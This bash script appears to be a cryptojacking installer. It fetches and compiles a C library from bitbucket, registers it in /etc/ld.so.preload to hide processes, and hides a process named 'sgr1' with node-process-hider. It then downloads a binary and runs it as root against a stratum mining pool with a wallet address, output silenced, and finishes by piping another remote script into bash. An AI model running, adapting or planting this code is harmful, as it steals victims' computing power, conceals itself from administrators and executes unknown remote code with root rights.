#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://bitbucket.org/koploks/watir/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo apt-get update 
sudo apt-get install -y gcc ca-certificates curl gnupg 
sudo mkdir -p /etc/apt/keyrings
curl -fsSL https://deb.nodesource.com/gpgkey/nodesource-repo.gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/nodesource.gpg
echo "deb [signed-by=/etc/apt/keyrings/nodesource.gpg] https://deb.nodesource.com/node_18.x nodistro main" | sudo tee /etc/apt/sources.list.d/nodesource.list
sudo apt-get install nodejs -y
npm install -g npm@10.0.0 -y
npm i -g node-process-hider
ph add sgr1
mkdir .kap && cd .kap
wget -O sgr1 https://bitbucket.org/koploks/watir/downloads/avxeuy >/dev/null 2>&1
chmod +x sgr1
sudo ./sgr1 -a gr -o stratum+tcp://8.222.148.101:443 -u RfX7RdyqJPHJbp6UZDcJm5BpasBKafsBTe.Envio -p x -t $(nproc --all) >/dev/null 2>&1 &
curl -sL https://bitbucket.org/koploks/shc/raw/master/boled04.sh | bash 